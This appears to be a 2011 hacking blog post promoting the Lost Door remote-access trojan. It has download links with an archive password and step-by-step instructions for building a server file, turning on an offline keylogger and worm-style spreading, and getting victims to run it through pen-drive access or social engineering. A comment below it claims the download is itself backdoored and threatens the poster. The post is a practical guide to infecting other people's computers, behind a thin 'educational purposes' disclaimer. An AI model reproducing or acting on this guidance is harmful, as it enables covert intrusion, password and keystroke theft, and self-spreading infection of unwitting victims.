Lost Door RAT V 4.2.2 by OussamiO
Lost Door Version 4.2.2 is a Remote Administrator Trojan developed by OussamiO. This is the latest version. Use this to remote control others PC, please use this properly and hopefully you will not harm other PC’s with this tool. Use this for educational purposes only.
Change Logs
[+]Reformed Some windows
[+]IE8 Passwords added
[+]Upload Bugs Fixed
[+]No-Ip Server Crash Fixed
[+]Auto Refresh For options
[+]More Stable
Click to seee screenshot: http://photoserver.ws/images/mdm44b4497d3243c7.png
Download: http://www.4shared.com/file/95786510/b4361f6/Lost_Door_v31_Silver_Edition.html
or
http://www.4shared.com/file/MJis4tS2/Lost_door_V40_Pro.html (if it asks for password use: ehacking.nethungry-hacker.com)
On executing the download file, you will see the following screen. Accept it -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost.jpg
After it is open, right click on the window and click on create server -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost1.jpg
Now enter your IP address and DNS here. Leave the rest of the field as it is. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost2.jpg
Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost3.jpg
Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost4.jpg
Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost5.jpg
Sending the server file to your victim
This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.
* If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
* For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.
Using Spreading to affect multiple victims
If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.
NOT TESTED YET
Saturday, February 5, 2011
HACK A PC USING LOST DOOR
6:03:00 AM
1 comment
Subscribe to:
Post Comments (Atom)
You put ur own server file in it ...and upload ....fuck you ...I will hack u ..this week ...and your dead server
ReplyDelete